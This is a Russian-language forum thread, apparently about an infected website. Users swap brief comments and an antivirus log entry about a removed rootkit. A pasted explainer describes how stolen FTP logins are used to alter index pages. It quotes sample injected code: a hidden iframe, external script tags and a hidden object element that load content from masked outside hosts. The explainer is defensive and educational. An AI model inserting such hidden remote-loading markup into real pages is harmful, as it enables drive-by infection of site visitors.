Интересно с какой теперь целью если проблема решена?

I.N. Одна просьба. Когда инцидент будет изучен, можно огласить результаты? Ну очень интересно узнать - кто виноват (если кто-то вообще виновен).

Это уже не ко мне.

всем пихануть рекламу в наглую

02.01.2010 14:44:22 Защита в режиме реального времени файл C:\WINDOWS\system32\drivers\zgcascqab5.sys Win32/Rootkit.Agent.NPK троянская программа очищен удалением - изолирован NT AUTHORITY\SYSTEM Событие произошло в новом файле, созданном следующим приложением: C:\DOCUME~1\Admin\LOCALS~1\Temp\hiddenForm.exe.

пряздрявляю

У меня avast до сих пор ругается на эту. http://www.overclockers.ru/lab/35663.shtml

У меня avast до сих пор ругается на эту. http://www.overclockers.ru/lab/35663.shtml

Интересно, в чём была причина

Как происходит заражение сайта

Специальная программа заходит на каждый сервер из базы с помощью похищенного логина и пароля. Там она ищет файлы стандартные для большинства веб-сайтов, например, ‘index.php’, ‘index.asp’, ‘index.html’ и т.д., и меняет их содержимое так, чтобы отображение такой страницы на пользовательском компьютере могло вызвать его заражение.

Так как списки для FTP доступа могут многократно перепродаваться на закрытых форумах, заражение одних и тех же сайтов может происходить разными вирусами и не один раз.
Как выглядит вредоносный код

Примеры. Вредоносный код может добавлять к страницам такие конструкции:

<iframe src=”http: //****-*******.net/?click=12078406″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
или

<script src=http: //www.****.ru/script.js></script>
или такой

<object data=’http: //***.name/in.cgi?2 ‘ type=’text/html’ style=’display:none’></object>
А баннерная система для взрослых может использовать такой код:

<script language=”javascript”>
var xxxwidth= 300;
var xxxheight= 100;
var xxxbgcolor= ”;
var xxxcolor= ‘blue’;
var xxxsize= 16;
var xxxcount= 5;
</script>
<script language=”javascript” src=”http: //*****-*****.ru/load.php?id=330″></script>
Маскировка вредоносного кода

Часто авторы кода стараются затруднить его анализ и обнаружение, используя специальные техники, называемые обфускацией (от англ. obfuscation).
Почему происходит заражение? Казалось бы, страница просто загружается браузером и отображается. Если бы в программах не было ошибок, то загрузка и отображение были бы всегда безопасными действиями. К сожалению, такие ошибки (уязвимости) есть, они и используются злоумышленниками. Хотя компании регулярно выпускают обновления для своих продуктов, злоумышленники постоянно исследуют их в поиске новых уязвимостей.
Вредоносный код на загружаемой пользователем странице, выполняясь, использует уязвимости приложений, что позволяет злоумышленникам получить полный контроль над атакуемым компьютером. Специально написанная для этого программа или скрипт называется эксплойт (от англ. exploit). Эксплойты для разных типов уязвимостей объединяют в наборы (exploit packs) для повышения вероятности заражения компьютера жертвы. Для атаки используются уязвимости как в самом браузере, так и в других приложениях и дополнениях (например, в плагинах для просмотра PDF и flash).

Кстати, а что за "паук" лазит по конференции?

Любой бред и флуд будет отстреливаться очень жёстко.